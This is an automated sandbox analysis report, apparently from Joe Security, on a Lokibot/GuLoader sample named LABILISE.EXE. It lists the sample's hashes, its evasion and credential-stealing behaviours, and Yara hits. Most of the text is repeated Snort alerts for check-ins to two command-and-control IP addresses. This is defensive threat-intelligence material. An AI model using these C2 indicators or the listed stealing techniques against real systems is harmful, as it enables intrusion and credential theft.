Analysis Report LABILISE.EXE

Overview

General Information

Sample Name: LABILISE.EXE
Analysis ID: 254273
MD5: 0d4cb6d7ae2a6564c3783ca0e08ef2ea
SHA1: 157d220b0d0628429918a0323f9ec99054f68ea9
SHA256: 70bba4913ae90f045f4be502a8ccda7910f452485dc7365648e0665262cb931e

Detection

GuLoader Lokibot
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • LABILISE.EXE (PID: 6852 cmdline: 'C:\Users\user\Desktop\LABILISE.EXE' MD5: 0D4CB6D7AE2A6564C3783CA0E08EF2EA)
    • LABILISE.EXE (PID: 6888 cmdline: 'C:\Users\user\Desktop\LABILISE.EXE' MD5: 0D4CB6D7AE2A6564C3783CA0E08EF2EA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.1542558864.00000000007E7000.00000004.00000020.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
00000001.00000002.1541507567.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: LABILISE.EXE PID: 6852 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: LABILISE.EXE PID: 6888 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49811 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49811 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49812 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49813 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49814 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49815 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49816 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49817 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49818 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49819 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49820 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49821 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49822 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49823 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49824 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49825 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49826 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49827 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49828 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49829 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49830 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49831 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49832 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49833 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49834 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49835 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49836 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49837 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49838 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49839 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49840 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49841 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49842 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49843 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49844 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49845 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49846 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49847 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49848 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49849 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49850 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49851 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49852 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49853 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49854 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49855 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49855 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49855 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49855 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49856 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49857 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49858 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49859 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49860 -> 172.67.187.13:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49861 -> 104.28.4.154:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49861 -> 104.28.4.154:80
